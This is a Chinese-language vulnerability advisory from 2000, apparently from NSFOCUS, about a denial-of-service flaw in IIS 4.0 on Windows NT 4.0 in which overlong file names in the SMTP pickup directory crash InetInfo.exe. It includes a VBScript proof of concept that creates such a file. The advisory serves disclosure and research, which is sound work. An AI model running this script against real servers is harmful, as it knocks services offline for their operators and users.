首页 -> 安全研究

安全研究

安全漏洞
使IIS崩溃的长文件名漏洞

发布日期:2000-02-21
更新日期:2000-02-21

受影响系统:
Windows NT Server 4.0 with IIS 4.0(所有SP)
不受影响系统:
Windows 2000
描述:

来源:valentijn <iam@my.net>

    通过在\mailroot\pickup目录下创建长文件名文件可能会使InetInfo.exe(IIS应用程序服务)崩溃。远程攻击者利用这个漏洞能对IIS进行拒绝服务(DoS)攻击。
    \mailroot\pickup目录是由inetinfo.exe中SMTP服务器部份处理操作的。当监测到一条消息时将立即对其进行解析。在IIS的解析机制中,如果\mailroot\pickup目录下含有超过86字符长度的文件名,会使IIS崩溃。



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


    以下脚本例子能在远程服务器上创建这种文件:

<example script>

' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

         Set fso = createobject("scripting.filesystemobject")
         Thename = Createkey & fso.GetTempName & ".eml"
         Set Thefile =  fso.GetFolder(rootpath).CreateTextFile(TheName)
                 Thefile.writeline "X-Sender: CRASHTHIS@my.net"
                 Thefile.writeline "X-Receiver: dump@my.net"
                 Thefile.writeline "From: <CRASHTHIS@my.net>"
                 Thefile.writeline "To: <dump@my.net>"
                 Thefile.writeline "Subject: MINE DID NOT CRASH"
                 Thefile.writeline "Date: " & now()
                 Thefile.writeline "X-Generator: " & Thename
         Thefile.close
         Set thefile = nothing
         Thename = ""

Function Createkey
         for z = 1 to 80
                         randomize
                         a =     Int((25 * Rnd) + 1)
                         password = password & chr(a+65)
         next
         Createkey = password
end function
' Warning IF InetInfo.exe crashes it cannot be started again as long as
the file is still there!

</example script>



建议:

    暂无。



浏览次数:6504
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障